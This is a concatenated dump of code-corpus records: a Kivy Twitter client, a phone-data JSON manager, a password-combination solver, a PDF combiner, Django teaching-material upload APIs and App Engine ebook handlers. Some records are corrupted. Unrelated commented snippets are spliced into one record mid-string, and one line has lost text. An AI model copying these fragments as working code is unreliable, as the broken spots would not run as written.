len(cur.fetchall()):\n print(\"The account is already registered.\")\n msg = \"The account is already registered.\"\n else:\n insert_sql = 'insert into users (oauth_token_secret, user_id, x_auth_expires, oauth_token, screen_name) values (?,?,?,?,?)'\n account_data = (oauth_data['oauth_token_secret'],\n oauth_data['user_id'],\n oauth_data['x_auth_expires'],\n oauth_data['oauth_token'],\n oauth_data['screen_name']\n )\n c.execute(insert_sql, account_data)\n conn.commit()\n print(\"Account registration is completed.\")\n msg = \"Account registration is completed.\"\n conn.close()\n self.infomation.text = msg\n\n except KeyError:\n print(\"Error\")\n self.infomation.text = \"PIN code may be wrong\"\n\n except NameError:\n print(\"Error2\")\n self.infomation.text = \"Verify account on the browser\"\n\nclass TweetViewPane():\n\n def update_timeline(self):\n layout = GridLayout(cols=1, spacing=10, size_hint_y=None)\n\n layout.bind(minimum_height=layout.setter('height'))\n\n for i in range(10):\n btn = Button(text=str(i), size_hint_y=None, height=40)\n layout.add_widget(btn)\n self = ScrollView(pos_hint={'x': .5, 'y': .6}, size_hint=(None, None), size=(300, 200))\n self.add_widget(layout)\n print(self)\n print(\"aaa\")\n\n\n \n \nclass TimelineScreen(BoxLayout, Screen):\n #global infomation_message\n infomation = ObjectProperty(None)\n tweet_input_form = ObjectProperty(None)\n tweet_view = ObjectProperty(None)\n\n def update_timeline(self):\n TVP = TweetViewPane()\n TVP.update_timeline()\n # layout = GridLayout(cols=1, spacing=10, size_hint_y=None)\n # # Make sure the height is such that there is something to scroll.\n # layout.bind(minimum_height=layout.setter('height'))\n # for i in range(100):\n # btn = Button(text=str(i), size_hint_y=None, height=40)\n # layout.add_widget(btn)\n # root = ScrollView(pos_hint={'x': .3, 'y': .1}, size_hint=(.7, .7), size=(300, 200))\n # self.add_widget(layout)\n # print(\"aa\")\n\n \n\n \n def post_tweet(self): \n try:\n CK, CS = load_app_keys()\n ATK, ATS = load_access_tokens()\n tweet = self.tweet_input_form.text\n api = twitter.Api(consumer_key=CK,\n consumer_secret=CS,\n access_token_key=ATK,\n access_token_secret=ATS\n )\n api.PostUpdate(tweet)\n self.infomation.text = tweet + \" is 
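# A small illustration of the urllib.parse.parse_qsl() step used by both token
# methods above: the OAuth endpoints answer with a querystring-style body, and
# parse_qsl() turns it into the oauth_data dict. Token values are placeholders.
import urllib.parse

body = "oauth_token=abc123&oauth_token_secret=def456&oauth_callback_confirmed=true"
oauth_data = dict(urllib.parse.parse_qsl(body))
print(oauth_data["oauth_token"])               # -> abc123
print(oauth_data["oauth_callback_confirmed"])  # -> true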
tweeted.\"\n except twitter.error.TwitterError:\n print(\"Something Twitter Error\")\n\n except NameError:\n print(\"Error2\")\n self.infomation.text = \"Something error occurred\"\n # def update_timeline(self): \n # button = Button(text='My first button')\n # self.add_widget(button)\n \nclass ClientApp(App):\n def build(self):\n sm = ScreenManager()\n sm.add_widget(RegistAccountScreen(name='register'))\n sm.add_widget(SelectAccountScreen(name='select'))\n sm.add_widget(TimelineScreen(name='timeline'))\n return sm\n #return TimelineScreen()\n\n def on_enter(self, ti):\n print(\"on_enter[%s]\" % (ti.text))\n\nif __name__ == \"__main__\":\n dbname = 'Account.db'\n ClientApp().run()\n\n ######\n sys.exit()\n ######\n\n","sub_path":"tweetclient.py","file_name":"tweetclient.py","file_ext":"py","file_size_in_byte":10792,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"537063027","text":"\"\"\"\nA dataclass is now created here to store information regarding mobiles\n\"\"\"\nimport json\nfrom dataclasses import dataclass\n\n\n@dataclass\nclass Mobile:\n \"\"\"\n This is a dataclass that stores information regarding mobiles.\n It also handles insertion, deletion, update and deletion in smartphone_data.json\n file.\n \"\"\"\n name: str\n series: str\n camera_mp: int\n battery_ah: int\n cost: float\n manufacturer: str\n\n def __init__(self):\n self.name = ''\n self.manufacturer = ''\n self.camera_mp = 0\n self.battery_ah = 0\n self.cost = 0\n self.series = ''\n\n def writeData(self, name, manfac, camera_mp, battery_ah, series, cost):\n \"\"\"\n Method to enter data into a Mobile object\n \\nname: Name of mobile phone\n \\nmanfac: Manufacturer\n \\ncamera_mp: Value of Camera Resolution Megapixel\n \\nbattery_ah: mAH Value of Phone Batterys\n \\nseries: Phone series\n \\ncost: Cost of the phone\n \\nreturn: none\n \"\"\"\n self.name = name\n self.manufacturer = manfac\n self.camera_mp = camera_mp\n self.battery_ah = battery_ah\n self.series = series\n self.cost = cost\n\n @classmethod\n def getUserInput(cls):\n \"\"\"\n Takes user input for name, manufacturer, camera resolution (in MP) and Battery mAH Value\n \\nreturn: name, manufacturer, camera resolution, battery mAH Value\n \"\"\"\n nam = input(\"Enter phone name: \")\n manf = input(\"Enter manufacturer of phone: \")\n cam_mp = int(input(\"Enter megapixel value for camera: \"))\n batt_ah = int(input(\"Enter mAH value of battery: \"))\n return nam, manf, cam_mp, batt_ah\n\n def __str__(self):\n str1 = ''\n if self.name != '':\n str1 = \"Name: \" + self.name\n if self.manufacturer != '':\n str1 += \"\\nManufacturer: \" + self.manufacturer\n if self.camera_mp != '' and self.camera_mp != 0:\n str1 += \"\\nCamera MP: \" + str(self.camera_mp)\n if self.battery_ah != '' and self.battery_ah != 0:\n str1 += \"\\nBattery mAH: \" + str(self.battery_ah)\n if self.series != '':\n str1 += \"\\nSeries: \" + self.series\n if self.cost != '' and self.cost != 0:\n str1 += \"\\nCost: \" + str(self.cost)\n return str1\n\n @classmethod\n def writeFile(cls, mobile_list):\n \"\"\"\n Method that writes mobile_list data into the file smartphone_data.json\n \\nmobile_list: List of Mobile objects\n \\nreturn: none\n \"\"\"\n # f1 = open(\"smartphone_data.csv\", 'w', encoding='UTF-8', newline='')\n header = [\"Name\", \"Manufacturer\", \"Camera_mp\", \"Battery_ah\", \"Series\", \"Cost\"]\n # it1 = iter(header)\n m1 = []\n for ele in mobile_list:\n it1 = iter(header)\n it2 = iter([ele.name, ele.manufacturer, ele.camera_mp, 
ele.battery_ah, ele.series, ele.cost])\n dict1 = dict(zip(it1, it2))\n m1.append(dict1)\n # w1.writerow([item.name, item.manufacturer, item.camera_mp, item.battery_ah, item.series, item.cost])\n f1 = open(\"smartphone_data.json\", 'w', encoding='UTF-8')\n jsonString = json.dumps(m1, indent=2)\n f1.write(jsonString)\n f1.close()\n # print(\"File Written\\n\")\n # f1.close()\n\n @classmethod\n def readFile(cls):\n \"\"\"\n Reads the data present in file\n \\nreturn: List of mobile objects\n \"\"\"\n m1 = []\n f1 = open(\"smartphone_data.json\", 'r', encoding='UTF-8')\n data = json.load(f1)\n series_column = 4\n cost_column = 5\n k1 = 'Name'\n k2 = 'Manufacturer'\n k3 = 'Camera_mp'\n k4 = 'Battery_ah'\n k5 = 'Series'\n k6 = 'Cost'\n for item in data:\n m2 = Mobile()\n if len(item.keys()) == series_column:\n m2.writeData(item[k1], item[k2], item[k3], item[k4], '', '')\n elif len(item.keys()) == cost_column:\n m2.writeData(item[k1], item[k2], item[k3], item[k4], item[k5], '')\n else:\n m2.writeData(item[k1], item[k2], item[k3], item[k4], item[k5], item[k6])\n m1.append(m2)\n f1.close()\n return m1\n\n def addRowInFile(self):\n m1 = Mobile.readFile()\n header = [\"Name\", \"Manufacturer\", \"Camera_mp\", \"Battery_ah\", \"Series\", \"Cost\"]\n it1 = iter(header)\n it2 = iter([self.name, self.manufacturer, self.camera_mp, self.battery_ah, self.series, self.cost])\n dict1 = dict(zip(it1, it2))\n index = [index for index in range(len(m1)) if m1[index].name == self.name]\n if len(index) > 0:\n print(\"Error! Cannot add the record. Phone with this name already exists\")\n return\n with open(\"smartphone_data.json\", \"r+\", encoding='UTF-8') as file:\n data = json.load(file)\n data.append(dict1)\n file.seek(0)\n jsonString = json.dumps(data, indent=2)\n file.write(jsonString)\n print(\"File updated\")\n\n @classmethod\n def deleteRowInFile(cls):\n m1 = Mobile.readFile()\n name = input(\"Enter name of Phone which has to be deleted from file: \")\n index = [index for index in range(len(m1)) if m1[index].name == name]\n if len(index) == 0:\n print(\"No such phone name can be found\")\n return\n del m1[index[0]]\n Mobile.writeFile(m1)\n\n @classmethod\n def updateFile(cls):\n m1 = Mobile.readFile()\n name = input(\"Enter name of the phone for which the change has to be made: \")\n index = [index for index in range(len(m1)) if m1[index].name == name]\n if len(index) == 0:\n print(\"No such phone name can be found\")\n return\n print(\"Enter the value you wish to update:\"\n \"\\n 1 - Name\"\n \"\\n 2 - Manufacturer\"\n \"\\n 3 - Camera MP\"\n \"\\n 4 - Battery mAH\"\n \"\\n 5 - Cost\")\n ch = int(input(\"\\n Enter your choice: \"))\n if ch == 1:\n m1[index[0]].name = input(\"Enter new name for the phone: \")\n elif ch == 2:\n m1[index[0]].manufacturer = input(\"Enter name of Manufacturer \")\n elif ch == 3:\n m1[index[0]].camera_mp = int(input(\"Enter camera megapixel value: \"))\n elif ch == 4:\n m1[index[0]].battery_ah = int(input(\"Enter battery mAH value: \"))\n elif ch == 5:\n m1[index[0]].cost = float(input(\"Enter phone cost: \"))\n Mobile.writeFile(m1)\n\n @classmethod\n def searchFile(cls):\n \"\"\"\n Searches the file based on attributes\n \"\"\"\n m1 = Mobile.readFile()\n print(\"Enter the attribute based on which the search should occur:\"\n \"\\n 1 - Name\"\n \"\\n 2 - Manufacturer\"\n \"\\n 3 - Camera MP\"\n \"\\n 4 - Battery mAH\"\n \"\\n 5 - Series\")\n ch = int(input(\"Enter your choice: \"))\n if ch == 1:\n name = input(\"Enter name of Phone: \")\n index = [index for index in 
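# A minimal round-trip of the header/row pairing used by writeFile() and
# readFile() above: zipping the header with a value list yields the dict that
# json.dumps() serializes. The phone values are illustrative.
import json

header = ["Name", "Manufacturer", "Camera_mp", "Battery_ah", "Series", "Cost"]
row = ["PhoneX", "Acme", 48, 4500, "X", 299.0]
text = json.dumps([dict(zip(header, row))], indent=2)
assert json.loads(text)[0]["Name"] == "PhoneX"
print(text)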
range(len(m1)) if m1[index].name == name]\n if len(index) == 0:\n print(\"No such phone name can be found\")\n return\n print(m1[index[0]])\n\n if ch == 2:\n manf = input(\"Enter manufacturer name: \")\n index = [index for index in range(len(m1)) if m1[index].manufacturer == manf]\n if len(index) == 0:\n print(\"Not found\")\n return\n for i in index:\n print(m1[i])\n print(\"\\n\")\n\n if ch == 3:\n cam_mp = input(\"Enter Camera Megapixel value: \")\n index = [index for index in range(len(m1)) if m1[index].camera_mp == cam_mp]\n if len(index) == 0:\n print(\"Not found\")\n return\n for i in index:\n print(m1[i])\n print(\"\\n\")\n\n if ch == 4:\n batt_ah = input(\"Enter Battery mAH Value: \")\n index = [index for index in range(len(m1)) if m1[index].battery_ah == batt_ah]\n if len(index) == 0:\n print(\"Not found\")\n return\n for i in index:\n print(m1[i])\n print(\"\\n\")\n\n if ch == 5:\n series1 = input(\"Enter phone series: \")\n index = [index for index in range(len(m1)) if m1[index].series == series1]\n if len(index) == 0:\n print(\"Not found\")\n return\n for i in index:\n print(m1[i])\n print(\"\\n\")\n","sub_path":"dataclass_Mobile.py","file_name":"dataclass_Mobile.py","file_ext":"py","file_size_in_byte":8706,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"441389493","text":"L, C=map(int,(input().split()))\n\narr=list(input().split())\narr.sort()\ndef go(L,cur,cnt,i):\n if L==cnt:\n mo=0\n ja=0\n for j in cur:\n if j in ['a','e','i','o','u']:\n mo+=1\n else:\n ja+=1\n if mo>0 and ja>1:\n for j in cur:\n print(j,end='')\n print()\n return\n if C-cnt=C:\n return\n go(L,cur+arr[i:i+1],cnt+1,i+1)\n go(L,cur,cnt,i+1)\n\ngo(L,[],0,0)\n","sub_path":"암호 만들기.py","file_name":"암호 만들기.py","file_ext":"py","file_size_in_byte":497,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"631690119","text":"import argparse\n\nimport combine_helper as ch\nfrom combine_gui import Application, create_window\n\n\ndef setup_args():\n parser = argparse.ArgumentParser(\"combine.py\")\n parser.add_argument(\"pdf_folder\", type=str, \n help=\"folder containing pdf files\")\n parser.add_argument(\"outfile_name\", type=str, \n help=\"output pdf file name\")\n parser.add_argument(\"-w\", \"--window\", action=\"store_true\", dest=\"window\", \n help=\"start with GUI\")\n parser.add_argument(\"-m\", \"--monitor\", type=int, metavar=\"N\", dest=\"monitor\", default=-1, \n help=\"monitor source pdf folder every N seconds and automatically generate combined file.\")\n \n return parser\n\n\ndef run_window_mode(source_folder, output_file, monitor_delay):\n source_folder = None if source_folder == \"#\" else source_folder\n output_file = None if output_file == \"#\" else output_file\n monitor_delay = -1 if monitor_delay < 0 else monitor_delay\n\n window = create_window()\n app = Application(window, source_folder, output_file, monitor_delay)\n app.mainloop()\n window.destroy()\n\n\n# ====================================MAIN====================================\n#\nif __name__ == '__main__':\n argsparser = setup_args()\n args = argsparser.parse_args()\n\n try:\n if args.window:\n # launch window gui\n print(\"GUI\")\n run_window_mode(args.pdf_folder, args.outfile_name, args.monitor)\n else:\n if args.monitor:\n ch.monitorpdfs(args.pdf_folder, args.outfile_name, args.monitor)\n else:\n ch.combinepdfs(args.pdf_folder, args.outfile_name)\n except Exception as e:\n print(\"***ERROR*** 
{0}\".format(e))\n","sub_path":"combine.py","file_name":"combine.py","file_ext":"py","file_size_in_byte":1701,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"499377333","text":"\nfrom matplotlib.pyplot import figure, show\nimport numpy as npy\nfrom numpy.random import rand\n\n\nif 1: # picking on a scatter plot (matplotlib.collections.RegularPolyCollection)\n\n x, y, c, s = rand(4, 100)\n def onpick3(event):\n ind = event.ind\n print('onpick3 scatter:', ind, npy.take(x, ind), npy.take(y, ind))\n\n fig = figure()\n ax1 = fig.add_subplot(111)\n col = ax1.scatter(x, y, 100*s, c, picker=True)\n #fig.savefig('pscoll.eps')\n fig.canvas.mpl_connect('pick_event', onpick3)\n\nshow()\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n#from PyQt4 import QtGui\n#import sys\n\n\n#class Foo(QtGui.QMainWindow):\n# def __init__(self):\n# QtGui.QMainWindow.__init__(self)\n\n# items = ['foo', 'bar', 'yib', 'nuz', 'pip', 'rof']\n# cb = QtGui.QComboBox(self)\n# for i in items:\n# cb.addItem(i)\n\n# disable = [1, 4]\n# for i in disable:\n# cb.model().item(i).setEnabled(False)\n\n#if __name__ == \"__main__\":\n# app = QtGui.QApplication([])\n# foobar = Foo()\n# foobar.show()\n# sys.exit(app.exec_())\n\n#import numpy as np\n#import matplotlib.pyplot as plt\n\n#N = 3\n#ind = np.arange(N) # the x locations for the groups\n#width = 0.1 # the width of the bars\n\n#fig = plt.figure()\n#ax = fig.add_subplot(111)\n\n#yvals = [4, 9, 2]\n#rects1 = ax.bar(ind, yvals, width, color='r')\n#zvals = [1,2,3]\n#rects2 = ax.bar(ind+width, zvals, width, color='g')\n#kvals = [11,12,13]\n#rects3 = ax.bar(ind+width*2, kvals, width, color='b')\n\n#ax.set_ylabel('Scores')\n#ax.set_xticks(ind+width)\n#ax.set_xticklabels( ('2011-Jan-4', '2011-Jan-5', '2011-Jan-6') )\n#ax.legend( (rects1[0], rects2[0], rects3[0]), ('y', 'z', 'k') )\n\n#def autolabel(rects):\n# for rect in rects:\n# h = rect.get_height()\n# ax.text(rect.get_x()+rect.get_width()/2., 1.05*h, '%d'%int(h),\n# ha='center', va='bottom')\n\n#autolabel(rects1)\n#autolabel(rects2)\n#autolabel(rects3)\n\n## clean up\n#plt.tight_layout()\n#plt.show()\n\n## grouped bar histogram\n#n_bins = 10\n#x = np.random.randn(1000, 3)\n\n#fig, ax = plt.subplots()\n\n#colors = ['red', 'tan', 'lime']\n#ax.hist(x, n_bins, normed=1, histtype='bar', color=colors, label=colors)\n#ax.legend(prop={'size': 10})\n#ax.set_title('bars with legend')","sub_path":"PyQt4 apps/flight-gui/tmp.py","file_name":"tmp.py","file_ext":"py","file_size_in_byte":2223,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"430855514","text":"# coding:utf-8\n__author__ = 'Windy'\n\nimport traceback\nimport datetime\n\n\nfrom rest_framework.decorators import api_view\nfrom rest_framework.response import Response\nfrom django.db.models import Max\nfrom rest_framework.decorators import permission_classes\nfrom rest_framework.permissions import AllowAny\n\nfrom commons.basic_models import json_message\nfrom mis import models\nfrom mis.tasks import notices\nfrom materials.writer import dao\n\nimport logging\nlogger = logging.getLogger(__name__)\n\n\n@api_view(['GET'])\n@permission_classes((AllowAny, ))\ndef update_progress(request):\n \"\"\"\n 标记教材进度, 9999表示完成\n material -- 教材id\n \"\"\"\n params = request.GET\n sm_id = params.get('id', 0)\n progress = params.get('page', 0)\n clazz = params.get('clazz', 0)\n if int(progress) > 9999:\n return Response(json_message(success=False, msg=\"Failed\"))\n try:\n progress = int(progress)\n sm = 
models.StudentMaterials.objects.get(pk=sm_id)\n except:\n return Response(json_message(success=False, msg=\"Object Not found\"))\n if sm:\n sm.progress = progress\n sm.save()\n if clazz:\n try:\n cl = models.Classes.objects.get(pk=clazz)\n cl.material = sm.material\n cl.save()\n except:\n pass\n\n logger.info('%s Update student_material_id: %s to %s' % (request.user.username, sm_id, progress))\n return Response(json_message(msg=\"Success\"))\n\n\n@api_view(['POST'])\ndef material_upload_success(request):\n \"\"\"\n 上传教材成功\n 1.保存到数据库,\n 2.传到多贝云\n 3.转换成jpg\n package -- 教材包id\n key -- 问件路径\n nm -- file Name\n ext -- 文件扩展\n size -- 文件大小\n \"\"\"\n package_id = request.POST.get('packageId')\n key = request.POST.get('key')\n nm = request.POST.get('nm', '').split('.')[0]\n ext = request.POST.get('ext', '')\n size = request.POST.get('size', 0)\n try:\n size = float(size)\n except:\n size = 0\n try:\n max_order = models.Materials.objects.filter(package_id=package_id).aggregate(Max('order'))['order__max']\n max_order = max_order and max_order or 0\n m = models.Materials(package_id=package_id, name=nm, file=key, order=max_order + 1, size=size, ext=ext)\n # 转换并上传到多贝\n # convert(m, m.file.url)\n m.save()\n dao.foreign_convert.delay(m)\n except:\n logger.error(traceback.format_exc())\n return Response(json_message(success=False, msg=\"500 Server Error\"))\n data = dict(material=dict(id=m.id, pk=str(m.object_pk), url=m.file.url, name=m.name, pages=m.pages))\n return Response(json_message(data=data))\n\n\n@api_view(['POST'])\ndef attachment_upload_success(request):\n \"\"\"\n 上传教材附件成功\n 1.保存到数据库,\n 2.转换成jpg\n mid -- 教材包id\n key -- 问件路径\n nm -- file Name\n ext -- 文件扩展\n size -- 文件大小\n \"\"\"\n mid = request.POST.get('mid')\n key = request.POST.get('key')\n nm = request.POST.get('nm', '').split('.')[0]\n ext = request.POST.get('ext', '')\n size = request.POST.get('size', 0)\n try:\n size = float(size)\n except:\n size = 0\n try:\n at = models.Attachment(name=nm, file=key, size=size, ext=ext)\n at.save()\n m = models.Materials.objects.get(pk=mid)\n m.attachment.add(at)\n m.save()\n # TODO get pages, split to jpg, upload to duobeiyun\n\n except:\n logger.error(traceback.format_exc())\n return Response(json_message(success=False, msg=\"500 Server Error\"))\n return Response(json_message())\n\n\n@api_view(['POST'])\ndef material_replace_success(request):\n \"\"\"\n 替换教材\n 1.更新数据库,\n 2.传到多贝云\n 3.转换成jpg\n 4.通知相关人员教材更新\n\n mid -- 教材id\n key -- 文件路径\n nm -- file Name\n ext -- 文件扩展\n size -- 文件大小\n \"\"\"\n mid = request.POST.get('mid')\n key = request.POST.get('key')\n nm = request.POST.get('nm', '')\n ext = request.POST.get('ext', '')\n size = request.POST.get('size')\n\n try:\n size = float(size)\n except:\n size = 0\n try:\n m = models.Materials.objects.get(pk=mid)\n m.size = size\n m.file = key\n m.wxt_uuid = ''\n m.ext = ext\n m.name = nm\n m.pages = 0\n m.last_update = datetime.datetime.now()\n m.save()\n logger.info('Replace Material: Uid:%s-%s,Mid:%s', request.user.id, request.user.username, m.id)\n dao.foreign_convert.delay(m)\n except:\n logger.error(traceback.format_exc())\n return Response(json_message(success=False, msg=\"500 Server Error\"))\n data = dict(material=dict(id=m.id, pk=str(m.object_pk), url=m.file.url, name=m.name, pages=m.pages))\n return Response(json_message(data=data))\n\n\n@api_view(['POST'])\ndef del_material(request):\n \"\"\"\n 删除教材\n 1.检查学生是否在使用\n mid -- 教材id\n \"\"\"\n mid = request.POST.get('mid')\n try:\n m = models.Materials.objects.get(pk=mid)\n sm = 
models.StudentMaterials.objects.filter(material=m).filter(progress__gt=0)\n cnts = sm.count()\n if cnts:\n data = ''\n if cnts < 20:\n data = list(sm.values_list('student__number', flat=True))\n data = \"StudentId:\" + \",\".join(data)\n return Response(json_message(success=False,\n data=data,\n msg=\"Used by %s students, can not delete it\" % sm.count()))\n else:\n m.is_deleted = True\n m.last_update = datetime.datetime.now()\n m.save()\n logger.info('Del Material: Uid:%s-%s,Mid:%s', request.user.id, request.user.username, m.id)\n except:\n logger.error(traceback.format_exc())\n return Response(json_message(success=False, msg=\"500 Server Error\"))\n return Response(json_message())\n\n\n@api_view(['POST'])\ndef del_attachment(request):\n \"\"\"\n 删除教材附件\n attachment -- attachment Id\n \"\"\"\n attachment = request.POST.get('attachment')\n try:\n at = models.Attachment.objects.get(pk=attachment)\n at.is_deleted = True\n at.last_update = datetime.datetime.now()\n at.save()\n logger.info('Del Attachment: Uid:%s-%s,Mid:%s', request.user.id, request.user.username, attachment)\n except:\n logger.error(traceback.format_exc())\n return Response(json_message(success=False, msg=\"500 Server Error\"))\n return Response(json_message())\n\n\n@api_view(['GET'])\ndef convert_materials(request):\n \"\"\"\n 手动转换教材附件并上传至多贝云\n materials_id -- 教材id\n \"\"\"\n materials_id = request.GET.get('materials_id')\n try:\n m = models.Materials.objects.get(id=materials_id)\n # convert(material, material.file.url)\n dao.foreign_convert.delay(m)\n except:\n logger.error(traceback.format_exc())\n return Response(json_message(success=False, msg=\"500 Server Error\"))\n return Response(json_message())\n\n\n@api_view(['GET'])\ndef convert_unsuccessful_materials(request):\n \"\"\"\n 获得所有未进行图片转换的\n \"\"\"\n materials = models.Materials.objects.filter(md5=0)\n try:\n for m in materials:\n dao.foreign_convert.delay(m)\n except:\n logger.error(traceback.format_exc())\n return Response(json_message(success=False, msg=\"500 Server Error\"))\n return Response(json_message())\n","sub_path":"mis/materials/writer/apis.py","file_name":"apis.py","file_ext":"py","file_size_in_byte":7754,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"299817344","text":"# -*- coding: utf-8 -*-\n__author__ = 'nagaitomoyuki'\n\n\nimport logging\nimport webapp2\nimport hashlib\nimport random\nimport cgi\nimport codecs\n\nimport json\nfrom util import ndb_json\nfrom util.common import Common\nfrom util.common import CircleLoginSessionRequestHandler\nfrom google.appengine.ext.webapp import blobstore_handlers\nfrom google.appengine.ext import blobstore\nfrom google.appengine.api import files\nfrom model.circlebookinfomation import CircleBookInfomation\nfrom model.circleinfomation import CircleInfomation\nfrom model.circleinfomationdetail import CircleInfomationDetail\n\n\n\n\nlogging.getLogger().setLevel(logging.INFO)\n\nclass Index(CircleLoginSessionRequestHandler):\n\n def post(self):\n\n if self.invalidateSession():\n return self.returnSessionErrorResponse()\n\n\n res = {'session':True}\n\n self.response.content_type = 'application/json'\n self.response.write(ndb_json.toJSON(res))\n\n\n\nclass CreateUploadUrl(CircleLoginSessionRequestHandler):\n\n def post(self):\n\n if self.invalidateSession():\n return self.returnSessionErrorResponse()\n\n upload_url = blobstore.create_upload_url('/circle/api/mypage/ebooksinfomationsubmit')\n\n res = {\n 'session':True,\n 'uploadurl':upload_url\n }\n 
logging.info(upload_url)\n\n self.response.content_type = 'application/json'\n self.response.write(ndb_json.toJSON(res))\n\n\n\n\nclass EbooksInfomationSubmit(blobstore_handlers.BlobstoreUploadHandler,CircleLoginSessionRequestHandler):\n\n def post(self):\n\n if self.invalidateSession():\n return self.returnSessionErrorResponse()\n logging.info(self.request)\n\n param = self.request.arguments()\n logging.info(param)\n logging.info(self.request.get('title'))\n\n title = Common.postRequestToUnicode(self.request.get('title'))\n description = Common.postRequestToUnicode(self.request.get('description'))\n priceNo = int(self.request.get('price'))\n\n contentDataInfo = self.get_uploads('contentdata')[0]\n contentDataName = Common.postRequestToUnicode(contentDataInfo.filename)\n circleid = int(self.session['circleid'])\n\n\n\n# logging.info(contentDataInfo)\n# logging.info(str(contentDataInfo.key()))\n# logging.info(hashlib.md5(str(contentDataInfo.key())).hexdigest())\n\n #書籍データを GCSへコピーする\n# contentDataGCSPath = '/gs/dotculture/ebooks/bookImage_%d_%s' % (userid,hashlib.md5(str(contentDataInfo.key())).hexdigest())\n# Common.blobStoreToCloudStorage(contentDataInfo,contentDataGCSPath,'application/zip')\n\n info = CircleBookInfomation()\n info.circleInfomationId = circleid\n info.contentDataKey = contentDataInfo.key()\n info.contentDataName = contentDataName\n info.contentDataSize = contentDataInfo.size\n info.title = title\n info.description = description\n info.priceNo = priceNo\n info.state = CircleBookInfomation.STATE_UPLOAD\n info.sercret = hashlib.sha256(str(random.random())).hexdigest()\n\n info.put()\n\n\n self.redirect('/circle/mypage/index.html')\n\n\nclass BookInfomationEdit(CircleLoginSessionRequestHandler):\n\n def get(self):\n logging.info(self.request)\n\n if self.invalidateSession():\n return self.returnSessionErrorResponse()\n\n circleid = int(self.session['circleid'])\n circleBookInfomationId = int(self.request.get('id'))\n\n info = CircleBookInfomation.get_by_id(circleBookInfomationId)\n\n res = {\n 'response':{'status':200},\n 'circleBookInfomation':info,\n }\n\n self.response.content_type = 'application/json'\n self.response.write(ndb_json.toJSON(res))\n\n\n\nclass BookInfomationEditSubmit(CircleLoginSessionRequestHandler):\n\n def post(self):\n\n if self.invalidateSession():\n return self.returnSessionErrorResponse()\n logging.info(self.request)\n\n param = json.JSONDecoder().decode(self.request.body)\n\n logging.info(param)\n logging.info(param['title'])\n\n introduction= param['introduction']\n description = param['description']\n priceNo = int(param['price']['value'])\n\n circleid = int(self.session['circleid'])\n circleBookInfomationId = int(param['datastoreId'])\n\n\n info = CircleBookInfomation.get_by_id(circleBookInfomationId)\n\n if info.circleInfomationId != circleid:\n return self.returnSessionErrorResponse()\n\n\n info.description = description\n info.introduction = introduction\n info.priceNo = priceNo\n\n info.put()\n\n res = {'response':{'status':200},'check':True}\n\n self.response.content_type = 'application/json'\n self.response.write(ndb_json.toJSON(res))\n\n\n\nclass BookStatus(CircleLoginSessionRequestHandler):\n\n def get(self):\n\n if self.invalidateSession():\n return self.returnSessionErrorResponse()\n\n circleid = int(self.session['circleid'])\n\n ret = CircleBookInfomation.query(CircleBookInfomation.circleInfomationId==circleid).order(-CircleBookInfomation.insertDate).fetch_page(10)\n\n res = {\n 'response':{'status':200},\n 
'circleBookInfomationList':ret[0],\n 'cursor':None,\n 'more':ret[2],\n }\n\n if ret[1] is not None:\n res['cursor'] = ret[1].urlsafe()\n\n self.response.content_type = 'application/json'\n self.response.write(ndb_json.toJSON(res))\n\n\nclass FeedBack(CircleLoginSessionRequestHandler):\n\n def get(self):\n\n if self.invalidateSession():\n return self.returnSessionErrorResponse()\n\n circleid = int(self.session['circleid'])\n circleBookInfomationId = int(self.request.get('id'))\n\n bookinfo = CircleBookInfomation.get_by_id(circleBookInfomationId)\n\n if bookinfo.circleInfomationId != circleid:\n return self.returnSessionErrorResponse()\n\n sql_usertotal = \"select count(tmp.userid) from (select userid from watchlog where appid=%d group by userid) as tmp;\" % (int(circleBookInfomationId))\n sql_pageview = \"select count(userid) from watchlog where appid=%d;\" % (int(circleBookInfomationId))\n sql_watchtime = \"select sum(time) from watchlog where appid=%d;\" % (int(circleBookInfomationId))\n sql_top5 = \"select no,page,sum(time) as totaltime from watchlog where appid=%d group by no,page order by totaltime desc limit 5;\" % (int(circleBookInfomationId))\n\n conn = Common.getSqlConnection()\n cursor = conn.cursor()\n cursor.execute(sql_usertotal)\n usertotalrows = cursor.fetchall()\n cursor.execute(sql_pageview)\n pageviewrows = cursor.fetchall()\n cursor.execute(sql_watchtime)\n watchtimerows = cursor.fetchall()\n cursor.execute(sql_top5)\n top5rows = cursor.fetchall()\n conn.close()\n\n logging.info(usertotalrows[0])\n logging.info(pageviewrows[0])\n logging.info(watchtimerows[0][0])\n logging.info(top5rows)\n\n top5 = []\n for row in top5rows:\n element = {\n 'no':int(row[0]),\n 'page':int(row[1]),\n 'time':int(row[2])\n }\n top5.append(element)\n logging.info(top5)\n\n res = {\n 'response':{'status':200},\n 'usertotal':usertotalrows[0][0],\n 'pageview':pageviewrows[0][0],\n 'watchtime':int(watchtimerows[0][0]),\n 'top5':top5,\n }\n\n logging.info(ndb_json.toJSON(res))\n self.response.content_type = 'application/json'\n self.response.write(ndb_json.toJSON(res))\n\n\n\n\nclass GetCircleInfomationAndDetail(CircleLoginSessionRequestHandler):\n\n def get(self):\n\n if self.invalidateSession():\n return self.returnSessionErrorResponse()\n\n circleid = int(self.session['circleid'])\n\n infomation = CircleInfomation.get_by_id(circleid)\n detail = CircleInfomationDetail.query(CircleInfomationDetail.circleInfomationId==circleid).get()\n\n res = {\n 'response':{'status':200},\n 'infomation':infomation,\n 'detail':detail,\n }\n\n self.response.content_type = 'application/json'\n self.response.write(ndb_json.toJSON(res))\n\n\n\nclass SubmitCircleInfomationAndDetail(CircleLoginSessionRequestHandler):\n\n def post(self):\n\n if self.invalidateSession():\n return self.returnSessionErrorResponse()\n\n param = json.JSONDecoder().decode(self.request.body)\n\n circleid = int(self.session['circleid'])\n\n info = CircleInfomation.get_by_id(circleid)\n detail = CircleInfomationDetail.query(CircleInfomationDetail.circleInfomationId==circleid).get()\n\n\n info.circlename = param['circlename']\n info.circlenamekana = param['circlenamekana']\n info.password = Common.toPasswordHash(param['password'])\n # The 